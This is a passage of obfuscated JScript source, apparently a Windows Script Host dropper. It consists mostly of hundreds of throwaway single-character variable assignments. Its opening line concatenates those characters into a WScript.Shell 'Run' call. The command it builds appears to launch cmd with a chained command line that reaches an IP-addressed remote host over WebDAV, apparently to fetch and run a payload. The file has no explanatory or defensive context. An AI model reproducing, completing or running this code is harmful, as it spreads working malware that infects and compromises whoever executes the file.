13 | this[ygarh + qalzqz + weeru + ancbb + legpsrvrs + kvqkynxw + pkxsmsqfo][bpzqdzr + ancbb + kvwoszwpd + hjavqonuz + pkxsmsqfo + kvwoszwpd + ccumsk + dobaz + lfjko + kvwoszwpd + weeru + pkxsmsqfo] ( ygarh + qalzqz + weeru + ancbb + legpsrvrs + kvqkynxw + pkxsmsqfo + iroenlr + qalzqz + iprznjdq + kvwoszwpd + kfvpxyn + kfvpxyn ) [ancbb + tihispf + xrtpofy] ( weeru + clshucgko + dtbmt + iiuepuuc + yzxag + weeru + iiuepuuc + kvqkynxw + nldbrk + yvlekkjkt + kvwoszwpd + ancbb + tjfonvx + iprznjdq + kvwoszwpd + kfvpxyn + kfvpxyn + iroenlr + kvwoszwpd + ljdhzmktf + kvwoszwpd + iiuepuuc + wqwdlrmj + bpzqdzr + nldbrk + clshucgko + clshucgko + hjavqonuz + xrtpofy + dtbmt + iiuepuuc + dadbm + gtgkkfeqz + xrtpofy + qvsdigh + nldbrk + irzoyq + kvwoszwpd + wqwdlrmj + ygarh + kvwoszwpd + dobaz + duyrzlr + kvwoszwpd + hkvkbgqow + tihispf + kvwoszwpd + tjfonvx + pkxsmsqfo + iiuepuuc + wqwdlrmj + ccumsk + tihispf + pkxsmsqfo + zfhysky + legpsrvrs + kfvpxyn + kvwoszwpd + iiuepuuc + xndql + pkxsmsqfo + kvwoszwpd + clshucgko + kvqkynxw + xndql + nnvhmwxk + legpsrvrs + xrtpofy + qvsdigh + nldbrk + legpsrvrs + weeru + kvwoszwpd + iroenlr + kvqkynxw + dtbmt + prpbulql + iiuepuuc + iprznjdq + pkxsmsqfo + pkxsmsqfo + kvqkynxw + xslxxofq + yzxag + yzxag + tsassu + kwaii + zuajytle + iroenlr + tsassu + xubvl + zuajytle + iroenlr + tsassu + iroenlr + tnrpiqp + rqxjzoto + ozuaa + yzxag + legpsrvrs + xrtpofy + qvsdigh + nldbrk + legpsrvrs + weeru + kvwoszwpd + iroenlr + kvqkynxw + iprznjdq + kvqkynxw + dadbm + bgxshbu + bgxshbu + tjfonvx + pkxsmsqfo + hjavqonuz + ancbb + pkxsmsqfo + iiuepuuc + xndql + pkxsmsqfo + kvwoszwpd + clshucgko + kvqkynxw + xndql + nnvhmwxk + legpsrvrs + xrtpofy + qvsdigh + nldbrk + legpsrvrs + weeru + kvwoszwpd + iroenlr + kvqkynxw + dtbmt + prpbulql + bgxshbu + bgxshbu + weeru + clshucgko + dtbmt + iiuepuuc + yzxag + weeru + iiuepuuc + xrtpofy + kvwoszwpd + pkxsmsqfo + iiuepuuc + tihispf + tjfonvx + kvwoszwpd + iiuepuuc + nnvhmwxk + nnvhmwxk + tsassu + kwaii + zuajytle + iroenlr + tsassu + xubvl + zuajytle + iroenlr + tsassu + iroenlr + tnrpiqp + rqxjzoto + ozuaa + fvjxzpwjx + yrbdpu + yrbdpu + yrbdpu + yrbdpu + nnvhmwxk + dtbmt + hjavqonuz + qvsdigh + yvlekkjkt + yvlekkjkt + yvlekkjkt + ancbb + nldbrk + nldbrk + pkxsmsqfo + nnvhmwxk + bgxshbu + bgxshbu + weeru + clshucgko + dtbmt + iiuepuuc + yzxag + weeru + iiuepuuc + ancbb + kvwoszwpd + ftsgbws + tjfonvx + qvsdigh + ancbb + zuajytle + tnrpiqp + iiuepuuc + yzxag + tjfonvx + iiuepuuc + nnvhmwxk + nnvhmwxk + tsassu + kwaii + zuajytle + iroenlr + tsassu + xubvl + zuajytle + iroenlr + tsassu + iroenlr + tnrpiqp + rqxjzoto + ozuaa + fvjxzpwjx + yrbdpu + yrbdpu + yrbdpu + yrbdpu + nnvhmwxk + dtbmt + hjavqonuz + qvsdigh + yvlekkjkt + yvlekkjkt + yvlekkjkt + ancbb + nldbrk + nldbrk + pkxsmsqfo + nnvhmwxk + tsassu + tsassu + rqxjzoto + zenxsr + rqxjzoto + tnrpiqp + kwaii + rqxjzoto + tsassu + kwaii + tnrpiqp + xubvl + rqxjzoto + zenxsr + zenxsr + iroenlr + dtbmt + kfvpxyn + kfvpxyn, 0, false ); |
|
14 | } | |
15 | iprznjdq = "i"; | |
16 | iprznjdq = "T"; | |
17 | iprznjdq = "i"; | |
18 | iprznjdq = "x"; | |
19 | iprznjdq = "C"; | |
20 | iprznjdq = "M"; | |
21 | iprznjdq = "f"; | |
22 | iprznjdq = "I"; | |
23 | iprznjdq = "f"; | |
24 | iprznjdq = "a"; | |
25 | iprznjdq = "t"; | |
26 | iprznjdq = "k"; | |
27 | iprznjdq = "Y"; | |
28 | iprznjdq = "L"; | |
29 | iprznjdq = "X"; | |
30 | iprznjdq = "h"; | |
31 | tqscg = "G"; | |
32 | tqscg = "T"; | |
33 | tqscg = "D"; | |
34 | tqscg = "h"; | |
35 | tqscg = "A"; | |
36 | tqscg = "f"; | |
37 | tqscg = "p"; | |
38 | tqscg = "U"; | |
39 | tqscg = "L"; | |
40 | tqscg = "F"; | |
41 | tqscg = "x"; | |
42 | tqscg = "f"; | |
43 | tqscg = "A"; | |
44 | tqscg = "B"; | |
45 | tqscg = "q"; | |
46 | tqscg = "b"; | |
47 | tqscg = "P"; | |
48 | tqscg = "J"; | |
49 | tqscg = "q"; | |
50 | tqscg = "k"; | |
51 | tqscg = "R"; | |
52 | tqscg = "z"; | |
53 | tqscg = "V"; | |
54 | tqscg = "n"; | |
55 | tqscg = "q"; | |
56 | tqscg = "Y"; | |
57 | tqscg = "S"; | |
58 | tqscg = "l"; | |
59 | tqscg = "o"; | |
60 | tqscg = "f"; | |
61 | tqscg = "p"; | |
62 | tqscg = "M"; | |
63 | tqscg = "v"; | |
64 | tqscg = "p"; | |
65 | tqscg = "S"; | |
66 | tqscg = "P"; | |
67 | tqscg = "s"; | |
68 | tqscg = "A"; | |
69 | tqscg = "z"; | |
70 | tqscg = "q"; | |
71 | tqscg = "x"; | |
72 | tqscg = "O"; | |
73 | tqscg = "H"; | |
74 | lfjko = "f"; | |
75 | lfjko = "j"; | |
76 | lfjko = "o"; | |
77 | lfjko = "L"; | |
78 | lfjko = "e"; | |
79 | lfjko = "G"; | |
80 | lfjko = "D"; | |
81 | lfjko = "Y"; | |
82 | lfjko = "F"; | |
83 | lfjko = "f"; | |
84 | lfjko = "e"; | |
85 | lfjko = "m"; | |
86 | lfjko = "r"; | |
87 | lfjko = "c"; | |
88 | lfjko = "y"; | |
89 | lfjko = "o"; | |
90 | lfjko = "T"; | |
91 | lfjko = "h"; | |
92 | lfjko = "h"; | |
93 | lfjko = "z"; | |
94 | lfjko = "k"; | |
95 | lfjko = "F"; | |
96 | lfjko = "T"; | |
97 | lfjko = "w"; | |
98 | lfjko = "e"; | |
99 | lfjko = "s"; | |
100 | lfjko = "q"; | |
101 | lfjko = "h"; | |
102 | lfjko = "K"; | |
103 | lfjko = "S"; | |
104 | lfjko = "r"; | |
105 | lfjko = "z"; | |
106 | lfjko = "W"; | |
107 | lfjko = "W"; | |
108 | lfjko = "U"; | |
109 | lfjko = "E"; | |
110 | lfjko = "W"; | |
111 | lfjko = "x"; | |
112 | lfjko = "G"; | |
113 | lfjko = "b"; | |
114 | lfjko = "X"; | |
115 | lfjko = "j"; | |
116 | pphjv = "V"; | |
117 | pphjv = "H"; | |
118 | pphjv = "T"; | |
119 | pphjv = "Q"; | |
120 | pphjv = "Q"; | |
121 | pphjv = "b"; | |
122 | pphjv = "r"; | |
123 | pphjv = "W"; | |
124 | pphjv = "u"; | |
125 | pphjv = "V"; | |
126 | pphjv = "e"; | |
127 | pphjv = "b"; | |
128 | pphjv = "w"; | |
129 | pphjv = "E"; | |
130 | pphjv = "A"; | |
131 | pphjv = "l"; | |
132 | pphjv = "S"; | |
133 | pphjv = "A"; | |
134 | pphjv = "n"; | |
135 | pphjv = "i"; | |
136 | pphjv = "K"; | |
137 | nldbrk = "L"; | |
138 | nldbrk = "f"; | |
139 | nldbrk = "N"; | |
140 | nldbrk = "z"; | |
141 | nldbrk = "r"; | |
142 | nldbrk = "n"; | |
143 | nldbrk = "A"; | |
144 | nldbrk = "W"; | |
145 | nldbrk = "l"; | |
146 | nldbrk = "M"; | |
147 | nldbrk = "G"; | |
148 | nldbrk = "n"; | |
149 | nldbrk = "w"; | |
150 | nldbrk = "N"; | |
151 | nldbrk = "W"; | |
152 | nldbrk = "D"; | |
153 | nldbrk = "c"; | |
154 | nldbrk = "c"; | |
155 | nldbrk = "n"; | |
156 | nldbrk = "O"; | |
157 | nldbrk = "F"; | |
158 | nldbrk = "V"; | |
159 | nldbrk = "G"; | |
160 | nldbrk = "B"; | |
161 | nldbrk = "d"; | |
162 | nldbrk = "a"; | |
163 | nldbrk = "o"; | |
164 | nldbrk = "j"; | |
165 | nldbrk = "g"; | |
166 | nldbrk = "P"; | |
167 | nldbrk = "g"; | |
168 | nldbrk = "X"; | |
169 | nldbrk = "V"; | |
170 | nldbrk = "X"; | |
171 | nldbrk = "r"; | |
172 | nldbrk = "J"; | |
173 | nldbrk = "W"; | |
174 | nldbrk = "I"; | |
175 | nldbrk = "h"; | |
176 | nldbrk = "o"; | |
177 | ozuaa = "b"; | |
178 | ozuaa = "c"; | |
179 | ozuaa = "t"; | |
180 | ozuaa = "l"; | |
181 | ozuaa = "H"; | |
182 | ozuaa = "j"; | |
183 | ozuaa = "g"; | |
184 | ozuaa = "c"; | |
185 | ozuaa = "M"; | |
186 | ozuaa = "R"; | |
187 | ozuaa = "s"; | |
188 | ozuaa = "X"; | |
189 | ozuaa = "D"; | |
190 | ozuaa = "J"; | |
191 | ozuaa = "H"; | |
192 | ozuaa = "U"; | |
193 | ozuaa = "B"; | |
194 | ozuaa = "Y"; | |
195 | ozuaa = "q"; | |
196 | ozuaa = "O"; | |
197 | ozuaa = "U"; | |
198 | ozuaa = "Z"; | |
199 | ozuaa = "h"; | |
200 | ozuaa = "K"; | |
201 | ozuaa = "h"; | |
202 | ozuaa = "u"; | |
203 | ozuaa = "g"; | |
204 | ozuaa = "s"; | |
205 | ozuaa = "5"; | |
206 | yrbdpu = "X"; | |
207 | yrbdpu = "L"; | |
208 | yrbdpu = "D"; | |
209 | yrbdpu = "O"; | |
210 | yrbdpu = "G"; | |
211 | yrbdpu = "A"; | |
212 | yrbdpu = "I"; | |
213 | yrbdpu = "S"; | |
214 | yrbdpu = "E"; | |
215 | yrbdpu = "p"; | |
216 | yrbdpu = "B"; | |
217 | yrbdpu = "c"; | |
218 | yrbdpu = "W"; | |
219 | yrbdpu = "S"; | |
220 | yrbdpu = "t"; | |
221 | yrbdpu = "H"; | |
222 | yrbdpu = "8"; | |
223 | oyhewto = "b"; | |
224 | oyhewto = "R"; | |
225 | oyhewto = "x"; | |
226 | oyhewto = "d"; | |
227 | oyhewto = "m"; | |
228 | oyhewto = "g"; | |
229 | oyhewto = "C"; | |
230 | oyhewto = "M"; | |
231 | oyhewto = "A"; | |
232 | oyhewto = "i"; | |
233 | oyhewto = "Q"; | |
234 | oyhewto = "Z"; | |
235 | oyhewto = "m"; | |
236 | oyhewto = "G"; | |
237 | oyhewto = "L"; | |
238 | oyhewto = "v"; | |
239 | oyhewto = "b"; | |
240 | oyhewto = "c"; | |
241 | oyhewto = "G"; | |
242 | oyhewto = "T"; | |
243 | xndql = "B"; | |
244 | xndql = "E"; | |
245 | xndql = "k"; | |
246 | xndql = "J"; | |
247 | xndql = "n"; | |
248 | xndql = "O"; | |
249 | xndql = "y"; | |
250 | xndql = "%"; | |
251 | zenxsr = "k"; | |
252 | zenxsr = "q"; | |
253 | zenxsr = "b"; | |
254 | zenxsr = "q"; | |
255 | zenxsr = "E"; | |
256 | zenxsr = "M"; | |
257 | zenxsr = "u"; | |
258 | zenxsr = "P"; | |
259 | zenxsr = "T"; | |
260 | zenxsr = "D"; | |
261 | zenxsr = "j"; | |
262 | zenxsr = "F"; | |
263 | zenxsr = "x"; | |
264 | zenxsr = "b"; | |
265 | zenxsr = "D"; | |
266 | zenxsr = "b"; | |
267 | zenxsr = "t"; | |
268 | zenxsr = "W"; | |
269 | zenxsr = "J"; | |
270 | zenxsr = "Q"; | |
271 | zenxsr = "r"; | |
272 | zenxsr = "R"; | |
273 | zenxsr = "V"; | |
274 | zenxsr = "c"; | |
275 | zenxsr = "Y"; | |
276 | zenxsr = "v"; | |
277 | zenxsr = "L"; | |
278 | zenxsr = "T"; | |
279 | zenxsr = "y"; | |
280 | zenxsr = "Y"; | |
281 | zenxsr = "y"; | |
282 | zenxsr = "r"; | |
283 | zenxsr = "i"; | |
284 | zenxsr = "g"; | |
285 | zenxsr = "Z"; | |
286 | zenxsr = "J"; | |
287 | zenxsr = "s"; | |
288 | zenxsr = "C"; | |
289 | zenxsr = "J"; | |
290 | zenxsr = "7"; | |
291 | ancbb = "K"; | |
292 | ancbb = "a"; | |
293 | ancbb = "C"; | |
294 | ancbb = "t"; | |
295 | ancbb = "F"; | |
296 | ancbb = "G"; | |
297 | ancbb = "Y"; | |
298 | ancbb = "t"; | |
299 | ancbb = "C"; | |
300 | ancbb = "q"; | |
301 | ancbb = "z"; | |
302 | ancbb = "j"; | |
303 | ancbb = "V"; | |
304 | ancbb = "K"; | |
305 | ancbb = "b"; | |
306 | ancbb = "E"; | |
307 | ancbb = "r"; | |
308 | pkxsmsqfo = "T"; | |
309 | pkxsmsqfo = "d"; | |
310 | pkxsmsqfo = "D"; | |
311 | pkxsmsqfo = "Q"; | |
312 | pkxsmsqfo = "n"; | |
313 | pkxsmsqfo = "Q"; | |
314 | pkxsmsqfo = "K"; | |
315 | pkxsmsqfo = "s"; | |
316 | pkxsmsqfo = "A"; | |
317 | pkxsmsqfo = "K"; | |
318 | pkxsmsqfo = "R"; | |
319 | pkxsmsqfo = "b"; | |
320 | pkxsmsqfo = "O"; | |
321 | pkxsmsqfo = "c"; | |
322 | pkxsmsqfo = "q"; | |
323 | pkxsmsqfo = "B"; | |
324 | pkxsmsqfo = "a"; | |
325 | pkxsmsqfo = "I"; | |
326 | pkxsmsqfo = "F"; | |
327 | pkxsmsqfo = "b"; | |
328 | pkxsmsqfo = "m"; | |
329 | pkxsmsqfo = "x"; | |
330 | pkxsmsqfo = "t"; | |
331 | tsassu = "J"; | |
332 | tsassu = "T"; | |
333 | tsassu = "V"; | |
334 | tsassu = "N"; | |
335 | tsassu = "Y"; | |
336 | tsassu = "w"; | |
337 | tsassu = "s"; | |
338 | tsassu = "c"; | |
339 | tsassu = "i"; | |
340 | tsassu = "B"; | |
341 | tsassu = "x"; | |
342 | tsassu = "u"; | |
343 | tsassu = "N"; | |
344 | tsassu = "z"; | |
345 | tsassu = "k"; | |
346 | tsassu = "x"; | |
347 | tsassu = "M"; | |
348 | tsassu = "q"; | |
349 | tsassu = "y"; | |
350 | tsassu = "o"; | |
351 | tsassu = "r"; | |
352 | tsassu = "C"; | |
353 | tsassu = "H"; | |
354 | tsassu = "H"; | |
355 | tsassu = "k"; | |
356 | tsassu = "G"; | |
357 | tsassu = "J"; | |
358 | tsassu = "q"; | |
359 | tsassu = "J"; | |
360 | tsassu = "D"; | |
361 | tsassu = "M"; | |
362 | tsassu = "U"; | |
363 | tsassu = "a"; | |
364 | tsassu = "R"; | |
365 | tsassu = "u"; | |
366 | tsassu = "V"; | |
367 | tsassu = "z"; | |
368 | tsassu = "V"; | |
369 | tsassu = "r"; | |
370 | tsassu = "1"; | |
371 | jelolk = "R"; | |
372 | jelolk = "H"; | |
373 | jelolk = "E"; | |
374 | jelolk = "B"; | |
375 | jelolk = "R"; | |
376 | jelolk = "q"; | |
377 | jelolk = "O"; | |
378 | jelolk = "L"; | |
379 | clshucgko = "i"; | |
380 | clshucgko = "E"; | |
381 | clshucgko = "X"; | |
382 | clshucgko = "G"; | |
383 | clshucgko = "Y"; | |
384 | clshucgko = "Y"; | |
385 | clshucgko = "k"; | |
386 | clshucgko = "Y"; | |
387 | clshucgko = "h"; | |
388 | clshucgko = "Z"; | |
389 | clshucgko = "m"; | |
390 | clshucgko = "a"; | |
391 | clshucgko = "O"; | |
392 | clshucgko = "Z"; | |
393 | clshucgko = "E"; | |
394 | clshucgko = "C"; | |
395 | clshucgko = "L"; | |
396 | clshucgko = "b"; | |
397 | clshucgko = "M"; | |
398 | clshucgko = "w"; | |
399 | clshucgko = "b"; | |
400 | clshucgko = "X"; | |
401 | clshucgko = "M"; | |
402 | clshucgko = "j"; | |
403 | clshucgko = "Y"; | |
404 | clshucgko = "F"; | |
405 | clshucgko = "R"; | |
406 | clshucgko = "R"; | |
407 | clshucgko = "f"; | |
408 | clshucgko = "l"; | |
409 | clshucgko = "V"; | |
410 | clshucgko = "z"; | |
411 | clshucgko = "U"; | |
412 | clshucgko = "B"; | |
413 | clshucgko = "N"; | |
414 | clshucgko = "i"; | |
415 | clshucgko = "R"; | |
416 | clshucgko = "E"; | |
417 | clshucgko = "L"; | |
418 | clshucgko = "K"; | |
419 | clshucgko = "j"; | |
420 | clshucgko = "Q"; | |
421 | clshucgko = "e"; | |
422 | clshucgko = "m"; | |
423 | ftsgbws = "f"; | |
424 | ftsgbws = "w"; | |
425 | ftsgbws = "W"; | |
426 | ftsgbws = "z"; | |
427 | ftsgbws = "b"; | |
428 | ftsgbws = "t"; | |
429 | ftsgbws = "O"; | |
430 | ftsgbws = "e"; | |
431 | ftsgbws = "Y"; | |
432 | ftsgbws = "g"; | |
433 | ftsgbws = "i"; | |
434 | ftsgbws = "O"; | |
435 | ftsgbws = "k"; | |
436 | ftsgbws = "Q"; | |
437 | ftsgbws = "e"; | |
438 | ftsgbws = "S"; | |
439 | ftsgbws = "F"; | |
440 | ftsgbws = "v"; | |
441 | ftsgbws = "n"; | |
442 | ftsgbws = "E"; | |
443 | ftsgbws = "z"; | |
444 | ftsgbws = "Z"; | |
445 | ftsgbws = "F"; | |
446 | ftsgbws = "S"; | |
447 | ftsgbws = "g"; | |
448 | jpljjerci = "M"; | |
449 | jpljjerci = "J"; | |
450 | jpljjerci = "p"; | |
451 | jpljjerci = "p"; | |
452 | jpljjerci = "D"; | |
453 | jpljjerci = "J"; | |
454 | jpljjerci = "Y"; | |
455 | jpljjerci = "Z"; | |
456 | jpljjerci = "W"; | |
457 | jpljjerci = "F"; | |
458 | jpljjerci = "x"; | |
459 | jpljjerci = "N"; | |
460 | jpljjerci = "m"; | |
461 | jpljjerci = "g"; | |
462 | jpljjerci = "V"; | |
463 | jpljjerci = "z"; | |
464 | jpljjerci = "X"; | |
465 | jpljjerci = "u"; | |
466 | jpljjerci = "a"; | |
467 | jpljjerci = "B"; | |
468 | jpljjerci = "S"; | |
469 | jpljjerci = "t"; | |
470 | jpljjerci = "r"; | |
471 | jpljjerci = "J"; | |
472 | jpljjerci = "g"; | |
473 | jpljjerci = "m"; | |
474 | jpljjerci = "U"; | |
475 | jpljjerci = "B"; | |
476 | jpljjerci = "p"; | |
477 | jpljjerci = "E"; | |
478 | jpljjerci = "C"; | |
479 | jpljjerci = "X"; | |
480 | jpljjerci = "P"; | |
481 | jpljjerci = "M"; | |
482 | jpljjerci = "l"; | |
483 | jpljjerci = "V"; | |
484 | jpljjerci = "J"; | |
485 | jpljjerci = "j"; | |
486 | jpljjerci = "Q"; | |
487 | jpljjerci = "l"; | |
488 | jpljjerci = "N"; | |
489 | jpljjerci = "c"; | |
490 | jpljjerci = "J"; | |
491 | jpljjerci = "Y"; | |
492 | kwaii = "A"; | |
493 | kwaii = "h"; | |
494 | kwaii = "f"; | |
495 | kwaii = "D"; | |
496 | kwaii = "M"; | |
497 | kwaii = "e"; | |
498 | kwaii = "U"; | |
499 | kwaii = "I"; | |
500 | kwaii = "m"; | |
501 | kwaii = "9"; | |
502 | zuajytle = "C"; | |
503 | zuajytle = "j"; | |
504 | zuajytle = "C"; | |
505 | zuajytle = "O"; | |
506 | zuajytle = "Q"; | |
507 | zuajytle = "H"; | |
508 | zuajytle = "w"; | |
509 | zuajytle = "H"; | |
510 | zuajytle = "l"; | |
511 | zuajytle = "B"; | |
512 | zuajytle = "o"; | |
513 | zuajytle = "c"; | |
514 | zuajytle = "X"; | |
515 | zuajytle = "G"; | |
516 | zuajytle = "y"; | |
517 | zuajytle = "3"; | |
518 | rqxjzoto = "I"; | |
519 | rqxjzoto = "a"; | |
520 | rqxjzoto = "0"; | |
521 | bpzqdzr = "c"; | |
522 | bpzqdzr = "K"; | |
523 | bpzqdzr = "w"; | |
524 | bpzqdzr = "G"; | |
525 | bpzqdzr = "k"; | |
526 | bpzqdzr = "c"; | |
527 | bpzqdzr = "c"; | |
528 | bpzqdzr = "y"; | |
529 | bpzqdzr = "A"; | |
530 | bpzqdzr = "h"; | |
531 | bpzqdzr = "n"; | |
532 | bpzqdzr = "o"; | |
533 | bpzqdzr = "u"; | |
534 | bpzqdzr = "w"; | |
535 | bpzqdzr = "z"; | |
536 | bpzqdzr = "Q"; | |
537 | bpzqdzr = "t"; | |
538 | bpzqdzr = "o"; | |
539 | bpzqdzr = "t"; | |
540 | bpzqdzr = "U"; | |
541 | bpzqdzr = "p"; | |
542 | bpzqdzr = "P"; | |
543 | bpzqdzr = "p"; | |
544 | bpzqdzr = "h"; | |
545 | bpzqdzr = "x"; | |
546 | bpzqdzr = "M"; | |
547 | bpzqdzr = "C"; | |
548 | nnvhmwxk = "C"; | |
549 | nnvhmwxk = "o"; | |
550 | nnvhmwxk = "i"; | |
551 | nnvhmwxk = "C"; | |
552 | nnvhmwxk = "L"; | |
553 | nnvhmwxk = "O"; | |
554 | nnvhmwxk = "L"; | |
555 | nnvhmwxk = "M"; | |
556 | nnvhmwxk = "J"; | |
557 | nnvhmwxk = "Q"; | |
558 | nnvhmwxk = "Z"; | |
559 | nnvhmwxk = "C"; | |
560 | nnvhmwxk = "H"; | |
561 | nnvhmwxk = "U"; | |
562 | nnvhmwxk = "G"; | |
563 | nnvhmwxk = "B"; | |
564 | nnvhmwxk = "e"; | |
565 | nnvhmwxk = "a"; | |
566 | nnvhmwxk = "b"; | |
567 | nnvhmwxk = "d"; | |
568 | nnvhmwxk = "Z"; | |
569 | nnvhmwxk = "i"; | |
570 | nnvhmwxk = "T"; | |
571 | nnvhmwxk = "s"; | |
572 | nnvhmwxk = "W"; | |
573 | nnvhmwxk = "k"; | |
574 | nnvhmwxk = "z"; | |
575 | nnvhmwxk = "s"; | |
576 | nnvhmwxk = "A"; | |
577 | nnvhmwxk = "q"; | |
578 | nnvhmwxk = "w"; | |
579 | nnvhmwxk = "F"; | |
580 | nnvhmwxk = "o"; | |
581 | nnvhmwxk = "h"; | |
582 | nnvhmwxk = "S"; | |
583 | nnvhmwxk = "p"; | |
584 | nnvhmwxk = "K"; | |
585 | nnvhmwxk = "\\"; | |
586 | bgxshbu = "A"; | |
587 | bgxshbu = "y"; | |
588 | bgxshbu = "c"; | |
589 | bgxshbu = "v"; | |
590 | bgxshbu = "d"; | |
591 | bgxshbu = "V"; | |
592 | bgxshbu = "V"; | |
593 | bgxshbu = "U"; | |
594 | bgxshbu = "t"; | |
595 | bgxshbu = "X"; | |
596 | bgxshbu = "Z"; | |
597 | bgxshbu = "&"; | |
598 | xslxxofq = "p"; | |
599 | xslxxofq = "U"; | |
600 | xslxxofq = "M"; | |
601 | xslxxofq = "Y"; | |
602 | xslxxofq = "N"; | |
603 | xslxxofq = "y"; | |
604 | xslxxofq = "h"; | |
605 | xslxxofq = "b"; | |
606 | xslxxofq = "Q"; | |
607 | xslxxofq = "X"; | |
608 | xslxxofq = "C"; | |
609 | xslxxofq = ":"; | |
610 | whatawre = "D"; | |
611 | whatawre = "f"; | |
612 | whatawre = "O"; | |
613 | whatawre = "i"; | |
614 | whatawre = "c"; | |
615 | whatawre = "i"; | |
616 | whatawre = "P"; | |
617 | kvqkynxw = "V"; | |
618 | kvqkynxw = "R"; | |
619 | kvqkynxw = "p"; | |
620 | dobaz = "g"; | |
621 | dobaz = "J"; | |
622 | dobaz = "P"; | |
623 | dobaz = "Q"; | |
624 | dobaz = "O"; | |
625 | dobaz = "m"; | |
626 | dobaz = "m"; | |
627 | dobaz = "O"; | |
628 | dobaz = "l"; | |
629 | dobaz = "I"; | |
630 | dobaz = "i"; | |
631 | dobaz = "p"; | |
632 | dobaz = "X"; | |
633 | dobaz = "q"; | |
634 | dobaz = "d"; | |
635 | dobaz = "x"; | |
636 | dobaz = "m"; | |
637 | dobaz = "k"; | |
638 | dobaz = "Q"; | |
639 | dobaz = "v"; | |
640 | dobaz = "h"; | |
641 | dobaz = "o"; | |
642 | dobaz = "R"; | |
643 | dobaz = "w"; | |
644 | dobaz = "w"; | |
645 | dobaz = "O"; | |
646 | dobaz = "W"; | |
647 | dobaz = "H"; | |
648 | dobaz = "l"; | |
649 | dobaz = "B"; | |
650 | dobaz = "K"; | |
651 | dobaz = "B"; | |
652 | dobaz = "o"; | |
653 | dobaz = "f"; | |
654 | dobaz = "b"; | |
655 | fvjxzpwjx = "u"; | |
656 | fvjxzpwjx = "J"; | |
657 | fvjxzpwjx = "r"; | |
658 | fvjxzpwjx = "C"; | |
659 | fvjxzpwjx = "Q"; | |
660 | fvjxzpwjx = "d"; | |
661 | fvjxzpwjx = "O"; | |
662 | fvjxzpwjx = "F"; | |
663 | fvjxzpwjx = "o"; | |
664 | fvjxzpwjx = "t"; | |
665 | fvjxzpwjx = "u"; | |
666 | fvjxzpwjx = "B"; | |
667 | fvjxzpwjx = "T"; | |
668 | fvjxzpwjx = "y"; | |
669 | fvjxzpwjx = "N"; | |
670 | fvjxzpwjx = "r"; | |
671 | fvjxzpwjx = "H"; | |
672 | fvjxzpwjx = "M"; | |
673 | fvjxzpwjx = "W"; | |
674 | fvjxzpwjx = "I"; | |
675 | fvjxzpwjx = "s"; | |
676 | fvjxzpwjx = "x"; | |
677 | fvjxzpwjx = "q"; | |
678 | fvjxzpwjx = "u"; | |
679 | fvjxzpwjx = "B"; | |
680 | fvjxzpwjx = "z"; | |
681 | fvjxzpwjx = "N"; | |
682 | fvjxzpwjx = "Z"; | |
683 | fvjxzpwjx = "h"; | |
684 | fvjxzpwjx = "g"; | |
685 | fvjxzpwjx = "M"; | |
686 | fvjxzpwjx = "@"; | |
687 | iroenlr = "l"; | |
688 | iroenlr = "C"; | |
689 | iroenlr = "e"; | |
690 | iroenlr = "M"; | |
691 | iroenlr = "g"; | |
692 | iroenlr = "p"; | |
693 | iroenlr = "i"; | |
694 | iroenlr = "C"; | |
695 | iroenlr = "m"; | |
696 | iroenlr = "K"; | |
697 | iroenlr = "E"; | |
698 | iroenlr = "h"; | |
699 | iroenlr = "r"; | |
700 | iroenlr = "B"; | |
701 | iroenlr = "G"; | |
702 | iroenlr = "J"; | |
703 | iroenlr = "a"; | |
704 | iroenlr = "R"; | |
705 | iroenlr = "a"; | |
706 | iroenlr = "."; | |
707 | qalzqz = "E"; | |
708 | qalzqz = "P"; | |
709 | qalzqz = "S"; | |
710 | hkvkbgqow = "O"; | |
711 | hkvkbgqow = "Q"; | |
712 | hkvkbgqow = "R"; | |
713 | hkvkbgqow = "o"; | |
714 | hkvkbgqow = "o"; | |
715 | hkvkbgqow = "S"; | |
716 | hkvkbgqow = "X"; | |
717 | hkvkbgqow = "I"; | |
718 | hkvkbgqow = "W"; | |
719 | hkvkbgqow = "P"; | |
720 | hkvkbgqow = "k"; | |
721 | hkvkbgqow = "L"; | |
722 | hkvkbgqow = "i"; | |
723 | hkvkbgqow = "R"; | |
724 | hkvkbgqow = "A"; | |
725 | hkvkbgqow = "I"; | |
726 | hkvkbgqow = "p"; | |
727 | hkvkbgqow = "E"; | |
728 | hkvkbgqow = "w"; | |
729 | hkvkbgqow = "A"; | |
730 | hkvkbgqow = "R"; | |
731 | hkvkbgqow = "L"; | |
732 | hkvkbgqow = "J"; | |
733 | hkvkbgqow = "b"; | |
734 | hkvkbgqow = "H"; | |
735 | hkvkbgqow = "t"; | |
736 | hkvkbgqow = "q"; | |
737 | xrtpofy = "H"; | |
738 | xrtpofy = "o"; | |
739 | xrtpofy = "B"; | |
740 | xrtpofy = "g"; | |
741 | xrtpofy = "E"; | |
742 | xrtpofy = "Q"; | |
743 | xrtpofy = "X"; | |
744 | xrtpofy = "X"; | |
745 | xrtpofy = "G"; | |
746 | xrtpofy = "Y"; | |
747 | xrtpofy = "r"; | |
748 | xrtpofy = "u"; | |
749 | xrtpofy = "P"; | |
750 | xrtpofy = "v"; | |
751 | xrtpofy = "r"; | |
752 | xrtpofy = "j"; | |
753 | xrtpofy = "H"; | |
754 | xrtpofy = "k"; | |
755 | xrtpofy = "x"; | |
756 | xrtpofy = "r"; | |
757 | xrtpofy = "K"; | |
758 | xrtpofy = "S"; | |
759 | xrtpofy = "c"; | |
760 | xrtpofy = "I"; | |
761 | xrtpofy = "X"; | |
762 | xrtpofy = "P"; | |
763 | xrtpofy = "X"; | |
764 | xrtpofy = "N"; | |
765 | xrtpofy = "P"; | |
766 | xrtpofy = "S"; | |
767 | xrtpofy = "t"; | |
768 | xrtpofy = "p"; | |
769 | xrtpofy = "Y"; | |
770 | xrtpofy = "T"; | |
771 | xrtpofy = "G"; | |
772 | xrtpofy = "r"; | |
773 | xrtpofy = "n"; | |
774 | ciinnh = "N"; | |
775 | ciinnh = "f"; | |
776 | ciinnh = "s"; | |
777 | ciinnh = "a"; | |
778 | ciinnh = "M"; | |
779 | ciinnh = "f"; | |
780 | ciinnh = "d"; | |
781 | ciinnh = "L"; | |
782 | ciinnh = "m"; | |
783 | ciinnh = "A"; | |
784 | ciinnh = "w"; | |
785 | ciinnh = "S"; | |
786 | ciinnh = "f"; | |
787 | ciinnh = "I"; | |
788 | ciinnh = "Y"; | |
789 | ciinnh = "z"; | |
790 | ciinnh = "X"; | |
791 | ciinnh = "U"; | |
792 | ciinnh = "s"; | |
793 | ciinnh = "Y"; | |
